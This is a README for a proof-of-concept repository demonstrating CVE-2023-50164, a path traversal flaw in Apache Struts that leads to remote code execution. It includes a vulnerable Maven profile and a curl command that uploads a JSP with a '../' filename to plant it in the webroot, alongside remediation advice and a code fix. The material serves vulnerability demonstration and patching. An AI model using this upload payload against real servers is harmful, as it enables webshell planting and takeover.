## https://sploitus.com/exploit?id=012A2C8A-0673-5AF7-9081-06F57EDBBDB5
This is a Proof of Concept (PoC) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), which outlines a
new path traversal vulnerability which can lead to Remote Code Execution (RCE) in
[struts-core](https://struts.apache.org/).
To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.
This repo builds off the excellent work of
[Henrik Plate](https://github.com/henrikplate) found [here](https://github.com/henrikplate/struts-demo).
## Run the PoC
There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.
To run _with the RCE vuln_, execute the following:
```
mvn clean jetty:run -P vuln
```
To run _without the RCE vuln_, execute the following:
```
mvn clean jetty:run -P no-vuln
```
The difference between the two profiles is `vuln` uses `struts-core` version `6.3.0.1`
(which has the path traversal vulnerability) and `no-vuln` uses `struts-core` version `6.3.0.2`
(which does not have the path traversal vulnerability)
## Exploit the Vuln
while running the `vuln` profile described above, execute the following:
```
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```
You'll be able to see the file `rogue.jsp` in the `src/main/webapp` folder and you can browse to it at:
`http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a **Ya been PWNED!** message).
There is a code fix solution that works with the older Struts versions, _but_, it is still highly advised to update
your version of Struts.
To exercise the code fix, execute the following:
```
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```
You'll see an error message: `Attempted path traversal attack`
**NOTE**: If you use the `no-vuln` profile, you **won't** get an error message from the `/upload-no-vuln`
endpoint, even if you use a relative path like: `../src/main/webapp/rogue.jsp`, as the new version of struts
automatically strips away relative path references.